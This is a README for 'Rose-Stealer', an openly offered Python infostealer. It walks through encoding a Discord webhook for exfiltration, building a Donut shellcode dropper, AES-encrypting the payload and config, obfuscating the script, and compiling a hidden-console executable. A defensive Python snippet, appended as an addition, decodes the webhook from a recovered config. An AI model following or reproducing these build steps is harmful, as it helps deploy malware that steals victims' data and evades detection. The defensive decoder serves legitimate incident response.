
0xRose/Rose-Stealer


🐍 Rose-Stealer

Rewritten version of the rose malware family.

Caution

I am not liable for anything that happens with this software. If you don't trust it, read the source.

Important

This is a small rewritten version of the rose implant. I don't provide support for this. You should know what you're doing.

Requirements

  • Python 3.10+
  • Python libraries installed (pip install -r assets\requirements.txt)

Setup

Download the source code of this repository.

  • Encode your Discord Webhook: python utils\b85_encode.py DISCORD_WEBHOOK
    • Place the output in the config.ini file:
      [main]
      # base 85 encoded and hexified discord webhook
      discord_webhook=DISCORD_WEBHOOK <--- Put the encoded webhook here
  • File dropper, if wanted:
    • Generate shellcode with Donut for an executable file, e.g. to client\shellc.dat
    • AES-encrypt the shellcode file:
      • python utils\aes_encrypt.py payload\shellc.dat payload\shellc.aes
      • Copy the output key into your config.ini file like this:
        [shellcode_loader]
        # file path storing AES encrypted and compressed shellcode
        shellcode_file_name=shellc.aes
        # hexified 32 byte (128-bit AES key)
        shellcode_key=AES_KEY <--- Put the AES key here
  • Edit the config file and change the False settings to True according to your needs.
  • Now encrypt the config file:
    • python utils\aes_encrypt.py payload\config.ini payload\config.aes
    • Put the output key you received into the malware source code on line 380:
      key = "AES_KEY"  # hexified 32 byte key (128-bit) <--- Put the AES key here

(Additionally, I would recommend adding obfuscation to the script at this point.)

  • You can now compile it into a binary:
    • Dropper enabled: pyinstaller --noconsole --onefile --clean --add-data "payload\shellc.aes;." --add-data "payload\config.aes;." --hidden-import cryptography --hidden-import pywin32 --hidden-import pillow --hidden-import aiohttp payload\main.py
    • Dropper disabled: pyinstaller --noconsole --onefile --clean --add-data "payload\config.aes;." --hidden-import cryptography --hidden-import pywin32 --hidden-import pillow --hidden-import aiohttp payload\main.py

Yay! Your executable is now inside the dist folder.
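For a defender who has recovered a sample's decrypted config.ini, the following added example (not part of this repository) reverses the webhook encoding described above so the exfiltration URL can be blocked or reported. It assumes the encoder is Python's base64.b85encode followed by hex; the Ascii85 fallback, the URL check and the sample config are constructed here.

```python
import base64
import configparser
from urllib.parse import urlparse

# Constructed sample of a recovered config.ini; the value is a placeholder
# webhook URL encoded the way the README describes (base85, then hexified).
SAMPLE_CONFIG = """[main]
# base 85 encoded and hexified discord webhook
discord_webhook={}
""".format(base64.b85encode(b"https://discord.com/api/webhooks/0000/PLACEHOLDER").hex())


def decode_webhook(encoded: str) -> str:
    """Reverse 'base85 encoded and hexified'.

    Assumption: the repository's encoder uses Python's base64.b85encode
    (RFC 1924 alphabet). If that alphabet rejects the data, Ascii85 is tried
    as a fallback. Only values that parse as a webhook-style URL are accepted,
    so garbage decodes from the wrong alphabet are not reported as hits.
    """
    raw = bytes.fromhex(encoded.strip())
    for decoder in (base64.b85decode, base64.a85decode):
        try:
            candidate = decoder(raw).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        parsed = urlparse(candidate)
        if parsed.scheme in ("http", "https") and parsed.netloc and "/webhooks/" in parsed.path:
            return candidate
    raise ValueError("value does not decode to a webhook URL with either base85 alphabet")


def extract_webhook(config_text: str) -> str:
    """Parse a recovered config.ini and return the decoded webhook URL.

    configparser ignores full-line '#' comments by default, so the comment
    line shown in the README's config snippet is skipped.
    """
    cp = configparser.ConfigParser()
    cp.read_string(config_text)
    return decode_webhook(cp["main"]["discord_webhook"])
```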
